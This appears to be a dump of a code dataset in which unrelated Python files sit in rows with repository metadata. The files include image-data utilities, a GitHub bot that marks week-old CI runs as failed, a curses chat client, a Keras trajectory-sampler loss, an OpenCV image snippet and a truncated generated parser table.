elif input_order == INPUT_ORDER_TIME:
return "time"
elif input_order == INPUT_ORDER_B:
return "b"
elif input_order == INPUT_ORDER_FA:
return "fa"
elif input_order == INPUT_ORDER_TE:
return "te"
elif input_order == INPUT_ORDER_FAULTY:
return "faulty"
elif issubclass(type(input_order), str):
keepcharacters = ('-', '_', '.', ' ')
return ''.join([c for c in input_order if c.isalnum() or c in keepcharacters]).rstrip()
else:
raise (UnknownTag("Unknown numerical input_order {:d}.".format(input_order)))
def str_to_input_order(s):
if s == "none":
return INPUT_ORDER_NONE
elif s == "time":
return INPUT_ORDER_TIME
elif s == "b":
return INPUT_ORDER_B
elif s == "fa":
return INPUT_ORDER_FA
elif s == "te":
return INPUT_ORDER_TE
elif s == "faulty":
return INPUT_ORDER_FAULTY
else:
# raise (UnknownTag("Unknown input order {}.".format(s)))
return s
def shape_to_str(shape):
"""Convert numpy image shape to printable string
Args:
shape
Returns:
printable shape (str)
Raises:
ValueError: when shape cannot be converted to printable string
"""
if len(shape) == 5:
return "{}x{}tx{}x{}x{}".format(shape[0], shape[1], shape[2], shape[3], shape[4])
elif len(shape) == 4:
return "{}tx{}x{}x{}".format(shape[0], shape[1], shape[2], shape[3])
elif len(shape) == 3:
return "{}x{}x{}".format(shape[0], shape[1], shape[2])
elif len(shape) == 2:
return "{}x{}".format(shape[0], shape[1])
elif len(shape) == 1:
return "{}".format(shape[0])
else:
raise ValueError("Unknown shape")
def get_size(obj, seen=None):
"""Recursively finds size of objects"""
size = sys.getsizeof(obj)
if seen is None:
seen = set()
obj_id = id(obj)
if obj_id in seen:
return 0
# Important mark as seen *before* entering recursion to gracefully handle
# self-referential objects
seen.add(obj_id)
if isinstance(obj, dict):
size += sum([get_size(v, seen) for v in obj.values()])
size += sum([get_size(k, seen) for k in obj.keys()])
elif hasattr(obj, '__dict__'):
size += get_size(obj.__dict__, seen)
elif hasattr(obj, '__iter__') and not isinstance(obj, (str, bytes, bytearray)):
size += sum([get_size(i, seen) for i in obj])
return size
def get_plugins_list():
from imagedata import plugins
return plugins['format'] if 'format' in plugins else []
def find_plugin(ftype):
"""Return plugin for given format type."""
plugins = get_plugins_list()
for pname, ptype, pclass in plugins:
if ptype == ftype:
return pclass()
raise FormatPluginNotFound("Plugin for format {} not found.".format(ftype)) | 26.155251 | 101 | 0.638268 | 381 | 0.066515 | 0 | 0 | 0 | 0 | 0 | 0 | 1,296 | 0.226257 |
2ccdff6aa866a17cd0285318cd41d8c54ce3426e | 9,652 | py | Python | webservice/monitor/autoMarkTimeOutPR.py | Jiangxinz/Paddle-bot | 87a1c381f2ca6a31d5bf665945625f6710f5292e | [
"Apache-2.0"
] | 14 | 2020-05-15T01:24:22.000Z | 2022-02-23T09:03:50.000Z | webservice/monitor/autoMarkTimeOutPR.py | Jiangxinz/Paddle-bot | 87a1c381f2ca6a31d5bf665945625f6710f5292e | [
"Apache-2.0"
] | 18 | 2020-05-06T09:45:31.000Z | 2021-12-29T13:00:51.000Z | webservice/monitor/autoMarkTimeOutPR.py | Jiangxinz/Paddle-bot | 87a1c381f2ca6a31d5bf665945625f6710f5292e | [
"Apache-2.0"
] | 11 | 2020-04-28T11:17:00.000Z | 2022-02-14T01:43:27.000Z | import os
import aiohttp
import asyncio
import json
import time
import datetime
import logging
import gidgethub
import requests
from gidgethub import aiohttp as gh_aiohttp
import sys
import pandas as pd
sys.path.append("..")
from utils.auth import get_jwt, get_installation, get_installation_access_token
from utils.test_auth_ipipe import xlyOpenApiRequest
from utils.readConfig import ReadConfig
logging.basicConfig(
level=logging.INFO,
filename='../logs/regularMark.log',
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
localConfig = ReadConfig(path='../conf/config.ini')
class MarkTimeoutCI(object):
def __init__(self, user, repo, gh):
self.pr_url = 'https://api.github.com/repos/%s/%s/pulls?per_page=100&page=1&q=addClass' % (
user, repo)
self.gh = gh
self.user = user
self.repo = repo
self.mark_url = 'https://xly.bce.baidu.com/open-api/ipipe/rest/v1/job-builds/{}/mark'
self.rerun_url = 'http://www.cipaddlepaddle.cn:8081/%s/%s/{}/{}' % (
user, repo)
self.comment_url = 'https://api.github.com/repos/%s/%s/issues/{}/comments' % (
user, repo)
def getNextUrl(self, link):
"""遍历所有的PR"""
next_str = None
for i in link.split(','):
if 'rel="next"' in i:
next_str = i
break
if next_str != None:
start_index = next_str.index('<')
end_index = next_str.index('>')
url = next_str[start_index + 1:end_index]
else:
url = None
return url
async def getBeforeSevenDaysPRList(self):
"""
1. 获取距离现在7天-30天创建的PR列表:只获取,不做处理
2. 30天之前的暂不处理: 默认认为GitHub已经设它们为code conflicts. 如有需要,后续在处理。
return : [{PR, commit, status_url}]
"""
today = datetime.date.today()
seven_Days_ago = str(today - datetime.timedelta(days=7))
month_Days_ago = str(today - datetime.timedelta(days=30))
overduelist = []
while (self.pr_url != None):
(code, header, body) = await self.gh._request(
"GET", self.pr_url,
{'accept': 'application/vnd.github.antiope-preview+json'})
res = json.loads(body.decode('utf8'))
for item in res:
if item['created_at'] < seven_Days_ago and item[
'created_at'] > month_Days_ago:
item_dic = {}
item_dic['PR'] = item['number']
item_dic['commit'] = item['head']['sha']
item_dic['status_url'] = item['statuses_url']
overduelist.append(item_dic)
self.pr_url = self.getNextUrl(header['link'])
print("before %s's PRs: %s" % (seven_Days_ago, overduelist))
logger.info("before %s's PRs: %s" % (seven_Days_ago, overduelist))
return overduelist
async def getCIstatus(self):
"""
获取符合条件的PR的CI列表:
1. 获取PR最新的commit url
2. 获取1的commit的最近的CI(去除一些GitHub的脏数据(eg. pending状态的))
3. 判断最近的CI是否是7天之前的,只要有一条CI是7天之前的就需要标记
4. 只标记成功的CI为失败
"""
PRList = await self.getBeforeSevenDaysPRList()
today = datetime.date.today()
seven_Days_ago = str(today - datetime.timedelta(days=7))
CI_STATUS_LIST = []
for item in PRList:
commit_ci_status = {}
commit_ci_status['PR'] = item['PR']
commit_ci_status['commit'] = item['commit']
status_url = item['status_url']
res = requests.get(status_url,
headers={'authorization': "token xxx"},
timeout=15).json()
commit_ci_status['CI'] = []
if_before_seven_day = [] #标记是否所有的CI都是7天之前的
for ci in res:
already_exit = False
if ci['context'] != 'license/cla':
for i in commit_ci_status['CI']:
if ci['context'] == i['ciName'] and i['time'] > ci[
'created_at']: #删除一些脏数据 github api
already_exit = True
break
if already_exit == False:
item_dic = {}
item_dic['time'] = ci['created_at']
item_dic['ciName'] = ci['context']
item_dic['status'] = ci['state']
item_dic['markId'] = ci['target_url'].split('/')[-1]
commit_ci_status['CI'].append(item_dic)
if item_dic['time'] > seven_Days_ago: #最新的一次CI不是7天之前的
if_before_seven_day.append(False)
else:
if_before_seven_day.append(True) #True 是7天之前的
if True in if_before_seven_day: #只要有一个CI是七天之前的就必须标记
print('%s is 7 ago..........' % item['PR'])
CI_STATUS_LIST.append(commit_ci_status)
else:
print('%s not 7 ago' % item['PR'])
logger.info("need to mark ci list: %s" % CI_STATUS_LIST)
return CI_STATUS_LIST
async def markCIFailed(self):
"""
mark success/pending ci to failed
"""
CIStatusList = await self.getCIstatus()
REQUIRED_CI = localConfig.cf.get('%s/%s' % (self.user, self.repo),
'REQUIRED_CI')
DATA = {"data": "FAIL", "message": "Paddle-bot", "type": "MARK"}
json_str = json.dumps(DATA)
headers = {
"Content-Type": "application/json",
"IPIPE-UID": "Paddle-bot"
}
for item in CIStatusList:
PR = item['PR']
commit = item['commit']
ci_list = item['CI']
mark_ci_list = []
for ci in ci_list:
if ci['ciName'] in REQUIRED_CI and ci[
'status'] in ['success', 'pending']:
markId = ci['markId']
mark_url = self.mark_url.format(markId)
res = xlyOpenApiRequest().post_method(
mark_url, json_str, headers=headers)
if res.status_code == 200 or res.status_code == 201:
mark_ci_list.append(ci['ciName'])
print('%s_%s_%s mark success!' %
(PR, commit, ci['ciName']))
logger.info('%s_%s_%s mark success!' %
(PR, commit, ci['ciName']))
else:
print('%s_%s_%s mark failed!' %
(PR, commit, ci['ciName']))
logger.error('%s_%s_%s mark failed!' %
(PR, commit, ci['ciName']))
if len(mark_ci_list) > 0:
marked = self.queryIfHasMark(PR, commit)
if marked == False:
self.inform(item)
else:
print('%s_%s has marked!!!!' % (PR, commit))
logger.info('%s_%s has marked!!!!' % (PR, commit))
data = {
'TIME': time.strftime("%Y%m%d %H:%M:%S", time.localtime()),
'PR': PR,
'COMMITID': commit,
'CINAME': mark_ci_list
}
self.save_markci_job(data)
def queryIfHasMark(self, PR, commitid):
"""marked 是否已经标记过"""
marked = True
df = pd.read_csv('../buildLog/mark_timeout_ci.csv')
queryKey = df[(df['PR'] == PR) & (df['COMMITID'] == commitid)]
if queryKey.empty:
marked = False
return marked
def create_markci_csv(self, filename):
"""创建存储文件"""
df = pd.DataFrame(columns=['TIME', 'PR', 'COMMITID', 'CINAME'])
df.to_csv(filename)
def save_markci_job(self, data):
"""将kill的任务存到"""
filename = '../buildLog/mark_timeout_ci.csv'
if os.path.exists(filename) == False:
self.create_markci_csv(filename)
write_data = pd.DataFrame(data)
write_data.to_csv(filename, mode='a', header=False)
async def inform(self, item):
"""Paddle-bot发出评论"""
#POST /repos/:owner/:repo/issues/:issue_number/comments
rerun_ci_link = self.rerun_url.format(item['PR'], item['commit'])
comment_url = self.comment_url.format(item['PR'])
shortId = item['commit'][0:7]
message = "Sorry to inform you that %s's CIs have passed for more than 7 days. To prevent PR conflicts, you need to re-run all CIs manually. " % shortId
await self.gh.post(comment_url, data={"body": message})
async def main(user, repo):
async with aiohttp.ClientSession() as session:
app_id = os.getenv("GH_APP_ID")
jwt = get_jwt(app_id)
gh = gh_aiohttp.GitHubAPI(session, user)
try:
installation = await get_installation(gh, jwt, user)
except ValueError as ve:
print(ve)
else:
access_token = await get_installation_access_token(
gh, jwt=jwt, installation_id=installation["id"])
# treat access_token as if a personal access token
gh = gh_aiohttp.GitHubAPI(
session, user, oauth_token=access_token["token"])
markCIObject = MarkTimeoutCI(user, repo, gh)
await markCIObject.markCIFailed()
loop = asyncio.get_event_loop()
loop.run_until_complete(main('PaddlePaddle', 'Paddle'))
| 40.898305 | 160 | 0.527455 | 8,580 | 0.852883 | 0 | 0 | 0 | 0 | 7,481 | 0.743638 | 2,656 | 0.264016 |
2cce9c4cd62357908959f1447500ae87d65847f9 | 2,579 | py | Python | messaging/messaging/client.py | Cornices/example | b13acfe9cf04badb326e8c1122149a81da739371 | [
"Apache-2.0"
] | 1 | 2020-06-08T09:03:40.000Z | 2020-06-08T09:03:40.000Z | messaging/messaging/client.py | Cornices/example | b13acfe9cf04badb326e8c1122149a81da739371 | [
"Apache-2.0"
] | 2 | 2017-07-11T14:04:21.000Z | 2022-01-11T14:52:32.000Z | messaging/messaging/client.py | Cornices/example | b13acfe9cf04badb326e8c1122149a81da739371 | [
"Apache-2.0"
] | 4 | 2017-03-14T14:22:57.000Z | 2021-04-13T09:37:24.000Z | import threading
import urllib2
import json
import time
import curses
_SERVER = 'http://localhost:6543'
def post(message, token):
headers = {'X-Messaging-Token': token}
req = urllib2.Request(_SERVER, headers=headers)
req.get_method = lambda: 'POST'
message = {'text': message}
req.add_data(json.dumps(message))
urllib2.urlopen(req)
def register(name):
url = _SERVER + '/users'
req = urllib2.Request(url)
req.add_data(name)
try:
res = urllib2.urlopen(req)
except urllib2.HTTPError:
return False
if res.getcode() != 200:
return False
return json.loads(res.read())['token']
class UpdateThread(threading.Thread):
def __init__(self, server, token, scr):
threading.Thread.__init__(self)
self.server = server
self.token = token
self.updating = False
self.pause = 1
self.scr = scr
def run(self):
self.updating = True
headers = {'X-Messaging-Token': self.token}
req = urllib2.Request(self.server, headers=headers)
while self.updating:
res = urllib2.urlopen(req)
result = json.loads(res.read())
if result == []:
continue
y, x = self.scr.getyx()
for index, line in enumerate(reversed(result)):
self.scr.addstr(index + 2, 0,
'%s> %s' % (line['user'], line['text']))
self.scr.move(y, x)
self.scr.addstr(y, x, '')
self.scr.refresh()
time.sleep(self.pause)
def stop(self):
self.updating = False
self.join()
def get_str(y, x, screen, msg):
screen.addstr(y, x, msg)
str = []
while True:
cchar = screen.getch()
if cchar == 10:
return ''.join(str)
str.append(chr(cchar))
def shell():
stdscr = curses.initscr()
stdscr.addstr(0, 0, "Welcome (type 'exit' to exit)")
token = None
while token is None:
name = get_str(1, 0, stdscr, 'Select a name : ')
token = register(name)
if token is None:
print('That name is taken')
update = UpdateThread(_SERVER, token, stdscr)
update.start()
while True:
try:
msg = get_str(10, 0, stdscr, '> ')
if msg == 'exit':
break
else:
post(msg, token)
stdscr.addstr(10, 0, ' ' * 100)
except KeyboardInterrupt:
update.stop()
curses.endwin()
if __name__ == '__main__':
shell()
| 23.87963 | 64 | 0.545173 | 996 | 0.386196 | 0 | 0 | 0 | 0 | 0 | 0 | 204 | 0.0791 |
e2bc3af3fad8262e4f0cc2a8d1f846408ae0a6c0 | 21 | py | Python | datasets/__init__.py | zack466/autoreg-sr | 88146370c04bc299c0f4fa3a43d9dbc237bb102c | [
"BSD-3-Clause"
] | null | null | null | datasets/__init__.py | zack466/autoreg-sr | 88146370c04bc299c0f4fa3a43d9dbc237bb102c | [
"BSD-3-Clause"
] | null | null | null | datasets/__init__.py | zack466/autoreg-sr | 88146370c04bc299c0f4fa3a43d9dbc237bb102c | [
"BSD-3-Clause"
] | null | null | null | from .div2k import *
| 10.5 | 20 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
e2bce366f9cb046b38a472eee939a2538e41a996 | 2,993 | py | Python | costar_models/python/costar_models/trajectory.py | cpaxton/costar_plan | be5c12f9d0e9d7078e6a5c283d3be059e7f3d040 | [
"Apache-2.0"
] | 66 | 2018-10-31T04:58:53.000Z | 2022-03-17T02:32:25.000Z | costar_models/python/costar_models/trajectory.py | cpaxton/costar_plan | be5c12f9d0e9d7078e6a5c283d3be059e7f3d040 | [
"Apache-2.0"
] | 8 | 2018-10-23T21:19:25.000Z | 2018-12-03T02:08:41.000Z | costar_models/python/costar_models/trajectory.py | cpaxton/costar_plan | be5c12f9d0e9d7078e6a5c283d3be059e7f3d040 | [
"Apache-2.0"
] | 25 | 2018-10-19T00:54:17.000Z | 2021-10-10T08:28:15.000Z | from .abstract import AbstractAgentBasedModel
import keras.backend as K
import numpy as np
from tensorflow import TensorShape
from keras.layers import Dense, Reshape
class TrajectorySamplerNetwork(AbstractAgentBasedModel):
'''
Supervised model. Takes in a set of trajectories from the current state;
learns a distribution that will regenerate these given some source of
noise.
Essentially, our goal is to minimize the average error between the whole
set of trajectories and our samples.
'''
def __init__(self):
pass
def AddSamplerLayer(x, num_samples, traj_length, feature_size, activation=None):
'''
Size of x must be reasonable. This turns the dense input into something
reasonable.
Parameters:
x: input tensor
num_samples: number of trajectories to generate
traj_length: how many points we want to sample in each trajectory
feature_size: dimensionality of each trajectory point
activation: optional activation function to add
'''
x = Dense(num_samples * traj_length * feature_size)(x)
if activation is not None:
x = activation(x)
x = Reshape((num_samples, traj_length, feature_size))(x)
return x
class TrajectorySamplerLoss(object):
def __init__(self, num_samples, traj_length, feature_size, acc_cost=None):
self.num_samples = num_samples
self.traj_length = traj_length
self.feature_size = feature_size
self.acc_cost = acc_cost
self.__name__ = "trajectory_sampler_loss"
def __call__(self, target, pred):
'''
Pred must be of size:
[batch_size=None, num_samples, traj_length, feature_size]
Targets must be of size:
[batch_size=None, traj_length, feature_size]
You can use the tools in "split" to generate this sort of data (for
targets). The actual loss function is just the L2 norm between each
point.
'''
# NOTE: cannot tile here, because target and pred have to be the same
# size. THAKS A LOT, KERAS.
# Tile each example point by the total number of samples
# target = K.tile(target, TensorShape([1,self.num_samples,1,1]))
# Compute L2 norm...
x = K.square(target - pred)
# sum along each output dimension for each point
x = K.sum(x,axis=-1,keepdims=False)
# square root and sum along each trajectory
x = K.sum(K.sqrt(x),axis=2,keepdims=False)
# mean across each sample
#x = K.min(x,axis=1,keepdims=False)
x = K.mean(x,axis=1,keepdims=False) #+ K.min(x,axis=1,keepdims=False)
if self.acc_cost is not None:
# Take the L2 norm of the acceleration output and add it to the
# loss.
# NOTE: we may end up computing this elsewhere to avoid extra
# penalties and stuff like that.
#cost = K.sum(K.square(acc))
return x + cost
else:
return x
| 33.255556 | 80 | 0.659205 | 2,167 | 0.724023 | 0 | 0 | 0 | 0 | 0 | 0 | 1,673 | 0.558971 |
e2bd10babdd8ebe01076d27ea6c764ee6769a395 | 351 | py | Python | CV0101EN-03-image_Region_of_img.py | reddyprasade/Computer-Vision-with-Python | 8eebec61f0fdacb05e122460d6845a32ae506c8f | [
"Apache-2.0"
] | null | null | null | CV0101EN-03-image_Region_of_img.py | reddyprasade/Computer-Vision-with-Python | 8eebec61f0fdacb05e122460d6845a32ae506c8f | [
"Apache-2.0"
] | null | null | null | CV0101EN-03-image_Region_of_img.py | reddyprasade/Computer-Vision-with-Python | 8eebec61f0fdacb05e122460d6845a32ae506c8f | [
"Apache-2.0"
] | null | null | null | # Image ROI(Region of Images)
import cv2 as cv
img = cv.imread('Photes/messi.jpg')
cv.imshow('Orginal Messi_Football',img)
ball = img[280:340, 330:390]
img[273:333, 100:160] = ball
cv.imshow('Change Messi_Football',img)
"""
import matplotlib.pyplot as plt
data = plt.imread('Photes/messi.jpg')
plt.imshow(data)
plt.show()
"""
| 17.55 | 40 | 0.669516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 205 | 0.584046 |
e2bddb86848e5c95d116992f9ebaa02ffddfa4b9 | 26,717 | py | Python | dialect/parsetab.py | ACov96/dialect | c739a2bba6e30805b8db1f5743a1eb2faac5c578 | [
"MIT"
] | 1 | 2019-09-21T22:54:50.000Z | 2019-09-21T22:54:50.000Z | dialect/parsetab.py | ACov96/dialect | c739a2bba6e30805b8db1f5743a1eb2faac5c578 | [
"MIT"
] | 1 | 2019-09-22T22:21:00.000Z | 2019-09-22T22:36:32.000Z | dialect/parsetab.py | ACov96/dialect | c739a2bba6e30805b8db1f5743a1eb2faac5c578 | [
"MIT"
] | null | null | null |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'statement_listleftPLUSMINUSleftMULTIPLYDIVIDEAND ATOM BANG BOOL COLON COMMA DIVIDE ELIF ELSE END EQUAL EXIT FUN GT ID IF IMPORT LBRACE LBRACKET LPAREN LT MAC MINUS MULTIPLY NOT NULL NUMBER OR PLACEHOLDER PLUS RBRACE RBRACKET RETURN RPAREN SEMICOLON STRING WHILEstatement_list : statement statement_list\n | emptyempty :statement : IMPORT STRING SEMICOLONstatement : assignment SEMICOLONstatement : conditionalstatement : expr SEMICOLONstatement : macro_defstatement : macro_callassignment : l_value EQUAL r_valuestatement : looploop : WHILE LPAREN expr RPAREN LBRACE statement_list RBRACEstatement : fun_deffun_def : FUN ID LPAREN id_list RPAREN LBRACE statement_list RBRACEstatement : RETURN expr SEMICOLONid_list : IDid_list : ID COMMA id_listid_list : emptyconditional : IF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elif conditional_elseconditional_elif : ELIF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elifconditional_elif : emptyconditional_else : ELSE LBRACE statement_list RBRACEconditional_else : emptyr_value : exprl_value : IDl_value : ID fieldsl_value : PLACEHOLDERl_value : PLACEHOLDER fieldsfields : LBRACKET expr RBRACKETfields : LBRACKET expr RBRACKET fieldsexpr : alg_opexpr : STRINGexpr : NUMBERexpr : BOOLexpr : NULLexpr : func_callexpr : IDexpr : LPAREN expr RPARENexpr : anonymous_fun func_call : ID LPAREN arg_list RPARENarg_list : emptyarg_list : exprarg_list : expr COMMA arg_listalg_op : expr PLUS expr\n | expr MINUS expr\n | expr MULTIPLY expr\n | expr DIVIDE exprexpr : LBRACKET arg_list RBRACKETexpr : LBRACE record_list RBRACEexpr : LPAREN statement_list RPARENrecord_list : ID COLON exprrecord_list : ID COLON expr COMMA record_listrecord_list : emptyexpr : expr LBRACKET expr RBRACKETexpr : comp_opexpr : PLACEHOLDERcomp_op : expr EQUAL EQUAL exprcomp_op : expr BANG EQUAL exprcomp_op : expr GT exprcomp_op : expr GT EQUAL exprcomp_op : expr LT exprcomp_op : expr LT EQUAL exprexpr : log_oplog_op : expr AND exprlog_op : expr OR exprlog_op : NOT exprmacro_def : MAC macro_def_arg_list LBRACE statement_list RBRACEmacro_def_arg_list : ATOM macro_def_arg_list_recmacro_def_arg_list_rec : PLACEHOLDER macro_def_arg_list_recmacro_def_arg_list_rec : ATOM macro_def_arg_list_recmacro_def_arg_list_rec : emptymacro_call : ATOM macro_arg_list SEMICOLONmacro_arg_list : ATOM macro_arg_listmacro_arg_list : expr macro_arg_listmacro_arg_list : emptyanonymous_fun : LPAREN id_list RPAREN LBRACE statement_list RBRACE'
_lr_action_items = {'IMPORT':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[4,4,-6,-8,-9,-11,-13,4,-5,-7,-4,-15,4,-72,4,4,-67,4,4,-3,-12,-3,-21,-14,-19,-23,4,-22,4,-3,-20,]),'RETURN':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[13,13,-6,-8,-9,-11,-13,13,-5,-7,-4,-15,13,-72,13,13,-67,13,13,-3,-12,-3,-21,-14,-19,-23,13,-22,13,-3,-20,]),'$end':([0,1,2,3,7,9,10,11,12,34,36,37,78,92,112,141,149,150,152,154,155,156,158,164,167,168,],[-3,0,-3,-2,-6,-8,-9,-11,-13,-1,-5,-7,-4,-15,-72,-67,-3,-12,-3,-21,-14,-19,-23,-22,-3,-20,]),'IF':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[15,15,-6,-8,-9,-11,-13,15,-5,-7,-4,-15,15,-72,15,15,-67,15,15,-3,-12,-3,-21,-14,-19,-23,15,-22,15,-3,-20,]),'STRING':([0,2,4,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[5,5,35,-32,-6,-8,-9,-11,-13,5,5,-31,-33,-34,-35,-36,-39,5,-55,-63,5,5,-5,-7,5,5,5,5,5,5,5,5,5,-37,-56,5,5,5,5,5,5,5,-66,-4,-44,-45,-46,-47,5,5,-59,5,-61,5,-64,-65,-15,-38,-50,-49,5,-48,5,5,-72,5,-54,-57,-58,-60,-62,5,-40,5,-67,5,-76,5,-3,-12,-3,-21,-14,-19,-23,5,5,-22,5,-3,-20,]),'NUMBER':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[19,19,-32,-6,-8,-9,-11,-13,19,19,-31,-33,-34,-35,-36,-39,19,-55,-63,19,19,-5,-7,19,19,19,19,19,19,19,19,19,-37,-56,19,19,19,19,19,19,19,-66,-4,-44,-45,-46,-47,19,19,-59,19,-61,19,-64,-65,-15,-38,-50,-49,19,-48,19,19,-72,19,-54,-57,-58,-60,-62,19,-40,19,-67,19,-76,19,-3,-12,-3,-21,-14,-19,-23,19,19,-22,19,-3,-20,]),'BOOL':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[20,20,-32,-6,-8,-9,-11,-13,20,20,-31,-33,-34,-35,-36,-39,20,-55,-63,20,20,-5,-7,20,20,20,20,20,20,20,20,20,-37,-56,20,20,20,20,20,20,20,-66,-4,-44,-45,-46,-47,20,20,-59,20,-61,20,-64,-65,-15,-38,-50,-49,20,-48,20,20,-72,20,-54,-57,-58,-60,-62,20,-40,20,-67,20,-76,20,-3,-12,-3,-21,-14,-19,-23,20,20,-22,20,-3,-20,]),'NULL':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[21,21,-32,-6,-8,-9,-11,-13,21,21,-31,-33,-34,-35,-36,-39,21,-55,-63,21,21,-5,-7,21,21,21,21,21,21,21,21,21,-37,-56,21,21,21,21,21,21,21,-66,-4,-44,-45,-46,-47,21,21,-59,21,-61,21,-64,-65,-15,-38,-50,-49,21,-48,21,21,-72,21,-54,-57,-58,-60,-62,21,-40,21,-67,21,-76,21,-3,-12,-3,-21,-14,-19,-23,21,21,-22,21,-3,-20,]),'ID':([0,2,5,7,9,10,11,12,13,16,17,18,19,20,21,22,24,25,26,28,30,32,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,99,100,101,104,105,106,112,114,116,117,118,119,120,121,123,128,137,139,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[23,23,-32,-6,-8,-9,-11,-13,50,57,60,-31,-33,-34,-35,-36,-39,50,-55,-63,50,76,50,-5,-7,50,50,50,50,50,50,50,50,50,-37,-56,50,50,50,50,50,50,50,-66,-4,-44,-45,-46,-47,50,50,-59,50,-61,50,-64,-65,-15,-38,-50,124,-49,50,-48,50,23,-72,50,124,-54,-57,-58,-60,-62,23,-40,23,60,-67,23,-76,23,-3,-12,-3,-21,-14,-19,-23,50,23,-22,23,-3,-20,]),'LPAREN':([0,2,5,7,9,10,11,12,13,15,16,18,19,20,21,22,23,24,25,26,28,30,31,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,57,63,64,71,73,75,76,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,153,154,155,156,158,159,160,164,165,167,168,],[16,16,-32,-6,-8,-9,-11,-13,16,53,16,-31,-33,-34,-35,-36,63,-39,16,-55,-63,16,75,16,-5,-7,16,16,16,16,16,16,16,16,16,63,-56,16,16,63,16,16,16,16,16,116,-66,-4,-44,-45,-46,-47,16,16,-59,16,-61,16,-64,-65,-15,-38,-50,-49,16,-48,16,16,-72,16,-54,-57,-58,-60,-62,16,-40,16,-67,16,-76,16,-3,-12,-3,159,-21,-14,-19,-23,16,16,-22,16,-3,-20,]),'LBRACKET':([0,2,5,7,8,9,10,11,12,13,16,18,19,20,21,22,23,24,25,26,27,28,30,33,36,37,38,39,40,41,42,45,46,47,48,49,50,51,52,53,54,57,63,64,67,71,73,75,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,94,95,96,97,100,101,103,104,105,106,112,114,115,117,118,119,120,121,123,127,128,129,134,137,141,142,145,148,149,150,152,154,155,156,158,159,160,161,164,165,167,168,],[25,25,-32,-6,38,-8,-9,-11,-13,25,25,-31,-33,-34,-35,-36,64,-39,25,-55,64,-63,25,25,-5,-7,25,25,25,25,25,25,25,25,25,38,-37,-56,25,25,38,64,25,25,38,25,114,25,38,-4,38,-44,-45,-46,-47,25,25,38,25,38,25,38,38,-15,38,38,-38,-50,-49,25,38,-48,25,25,-72,25,38,-54,38,38,38,38,25,38,-40,64,38,25,-67,25,-76,25,-3,-12,-3,-21,-14,-19,-23,25,25,38,-22,25,-3,-20,]),'LBRACE':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,69,70,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,98,100,101,104,105,106,107,108,109,110,112,114,117,118,119,120,121,122,123,128,132,133,135,137,141,142,143,145,148,149,150,152,154,155,156,157,158,159,160,163,164,165,167,168,],[17,17,-32,-6,-8,-9,-11,-13,17,17,-31,-33,-34,-35,-36,-39,17,-55,-63,17,17,-5,-7,17,17,17,17,17,17,17,17,17,-37,-56,17,17,17,17,106,-3,17,17,17,-66,-4,-44,-45,-46,-47,17,17,-59,17,-61,17,-64,-65,-15,-38,-50,123,-49,17,-48,17,17,-3,-68,-3,-71,-72,17,-54,-57,-58,-60,-62,137,17,-40,-70,-69,142,17,-67,17,148,-76,17,-3,-12,-3,-21,-14,-19,160,-23,17,17,165,-22,17,-3,-20,]),'PLACEHOLDER':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,70,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,107,109,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[27,27,-32,-6,-8,-9,-11,-13,51,27,-31,-33,-34,-35,-36,-39,51,-55,-63,51,51,-5,-7,51,51,51,51,51,51,51,51,51,-37,-56,51,51,51,51,109,51,51,51,-66,-4,-44,-45,-46,-47,51,51,-59,51